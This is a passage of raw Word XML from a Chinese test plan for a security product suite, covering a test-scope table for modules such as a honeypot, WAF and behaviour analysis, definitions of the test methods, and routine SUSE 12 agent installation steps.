            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>区块链客户端服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E39A9A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功能</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="252EF3A5"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接口测试</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1545BCD9"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性能测试；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F6A9FFF"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2888BC96"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高</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20B79881"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18D1600A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C0CF709"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用户行为分析</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="786E081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功能</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3039ECF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兼容性测试；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3944B4FE"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安全性测试；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BE05861"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p w14:paraId="08AB4E7E"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攻击程序自动化测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EEEF5AA"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高</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="205355F3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="381500ED"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web部署攻击程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="389018E1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="335E0E3D"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蜜罐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A551340"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功能</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CD056F6"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FA51DF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低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C7B7DA6"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2E987171" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B1745D6"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WAF防火墙</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16DECAE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功能</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C1AE78A"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F31A15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低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E07DC3A"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737629B9" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2944C3C2"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系统检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E16BCC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功能</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5955B759"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4867B7F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低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E0A128A"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6F31B5AC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="172B8623"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插件管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BC59DCA"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功能</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67434D9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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C0543FF"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低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="110E5DD0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="4802FC4E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="611381C4"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i/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>FAQ问答</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="446626D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界面测试；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DEC58B4"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文档测试；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F13A206"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手工测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F3B6F3B"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color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26272D56" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="359621CA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>注：各个测试方法类型解释如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9B19F9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手工测试：</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>采用人工操作，并人工观察确认测试结果的测试方法。如无特别的创新方法，诸如数据准备和场景描述策略等，此方法可以一笔带过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68404C42" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>自动化测试：</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用提前准备好的自动化case完全无人工干预的测试。该方法如果需要特别的工具、关键字开发，需要注明。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BA61E9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>自动化辅助测试：</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用工具，将测试的部分过程，比如结果保存（抓图）、数据上传、结果验证等用程序自动化实现，但是部分过程还需要人工验证的测试。该方法可以提高部分效率，但是或许需要人工去分析严重结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4AEAA1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新旧版本对比测试：</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在版本升级测试中，如果有两套环境，可以通过同样的输入和操作来对比验证结果的方式来进行测试和自动化测试，自动化测试可以使用coco2.0工具，常用与规避数据计算逻辑复杂的结果对比测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07180B2B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="247" w:name="_Toc36487912"/>
      <w:bookmarkStart w:id="248" w:name="_Toc36573231"/>
      <w:bookmarkStart w:id="249" w:name="_Toc223510687"/>
      <w:bookmarkStart w:id="250" w:name="_Toc227386490"/>
      <w:bookmarkStart w:id="251" w:name="_Toc227386347"/>
      <w:bookmarkStart w:id="252" w:name="_Toc224357950"/>
      <w:bookmarkStart w:id="253" w:name="_Toc36630308"/>
      <w:r w:rsidRPr="0020259A">
        <w:lastRenderedPageBreak/>
        <w:t>功能测试方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="247"/>
      <w:bookmarkEnd w:id="248"/>
      <w:bookmarkEnd w:id="253"/>
    </w:p>
    <w:p w14:paraId="40711A95" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="254" w:name="_Toc36487913"/>
      <w:bookmarkStart w:id="255" w:name="_Toc36573232"/>
      <w:bookmarkStart w:id="256" w:name="_Toc36630309"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="254"/>
      <w:bookmarkEnd w:id="255"/>
      <w:bookmarkEnd w:id="256"/>
    </w:p>
    <w:p w14:paraId="4E15952D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="257" w:name="_Toc36487914"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Suse12 安装过程：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="257"/>
    </w:p>
    <w:p w14:paraId="2D08D164"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(1)解压缩 tar xzf ***.tar.gz 进入解压得到的目录 cp config-single.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>conf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4655AE56"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(2)配置文件所在位置：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vim</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/config-single.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600DFE3E"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(3)配置需要修改的配置(截取需要修改的部分)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DF8B09"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tagent=192.168.1.183      #agent 的主机地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E58B13"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net_dev=eth0              #网卡设备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E151139"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#the ip of pca host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69428FD3"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PCA="192.168.1.249"       #pca 服务地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39947382"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#the same with pca host for oat host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F20249C"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OAT="192.168.1.249"       #oat 服务地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F293B1A"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#the ip of blackbox-server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCD4AC2"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blackSvr_ip="192.168.1.168"     #blackbox服务地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB9C70D"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#mysql database host ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B15F7A4"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mysql_host="192.168.1.210"      #数据库服务地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA3815"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(4)进入解压得到目录，bash install-agent.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2CD62784"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(5</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)reboot</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2EB6BB09"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(6)服务启动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33321812" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="1f4"/>
        <w:ind w:left="1080" w:firstLine="400"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> start tpminit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D22F2D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="1f4"/>
        <w:ind w:left="1080" w:firstLine="400"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> start tcsdinit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51689382" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="1f4"/>
        <w:ind w:left="1080" w:firstLine="400"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>/etc/init.d/tagent restart</w:t>
      </w:r>
    </w:p>
